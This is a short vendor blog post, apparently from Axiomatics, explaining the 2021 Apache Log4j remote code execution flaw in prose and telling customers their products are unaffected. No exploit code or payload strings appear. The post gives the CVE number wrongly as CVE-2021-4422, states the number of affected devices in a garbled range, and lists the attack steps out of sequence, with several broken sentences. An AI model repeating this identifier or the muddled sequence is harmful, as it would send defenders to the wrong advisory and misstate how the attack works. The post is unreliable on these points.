The Log4j vulnerability – What you need to know
As many of you know, on December 9, 2021 the Apache Log4j vulnerability (CVE-2021-4422) was discovered, affecting somewhere between 0 and 3 billion-plus devices currently running Java.
Though the vulnerability does not impact the Axiomatics platforms or solutions, we wanted to share insight on this vulnerability and what security teams should consider as they grapple with this event.
What’s going on?
On December 9, a remote code execution (RCE) vulnerability in Apache Log4j 2 was identified being exploited in the wild. Public proof of concept (PoC) code was release and a subsequent investigation revealed that exploitation was easy to perform.
More specifically, in submitting a specially-crafted request to a vulnerable system, depending on system configuration, an attacker can instruct that system to download, then execute a malicious payload.
Experts consider this a critical vulnerability because of its broad use in enterprise systems and web applications.
Put simply, this vulnerability will enable attackers to develop exploits leverage a variety of attack types to get access to critical information or processes from a wide variety of businesses.
How does this work?
Though we’re only starting to see exploits emerge, here’s an example of how an attacker could leverage this vulnerability:
- An attacker triggers a vulnerable Log4j server with a single string of text (HTTP Header).
- The Log4j instance makes a query ldap to the LDAP server, which responds with directory information.
- Action: The application reaches out to an external location (only if logged via the vulnerable instance of Log4j).
- Action: Special text is initiated in a HTTP user-agent header or simple POST form request.
- Action: The Log4j vulnerability parses this, then reaches out via the Java Naming and Directory Interface (JNDI).
- Action: A resource acts as a launch pad to another attacker-controlled endpoint, which serves Java code that is executed on the original victim.
What does this mean for Axiomatics customers?
Axiomatics solutions do not use any versions of Log4j 2 impacted by this vulnerability, so no actions specific to your Axiomatics solutions are required at this time.
We will continue to monitor the emergence of attacks based on this vulnerability and will share relevant information via our knowledge base portal.
Axiomatics customers can check out the latest guidance on our knowledge base.
What else can we do?
For security teams wondering if their systems are impacted and, if so, what they can do, this blog post written by security analysts at Forrester Research offers a solid starting point.
If you’re looking for a higher-level explanation of what this means, check out this blog post from Forrester analyst Allie Mellen (aka hackerxbella).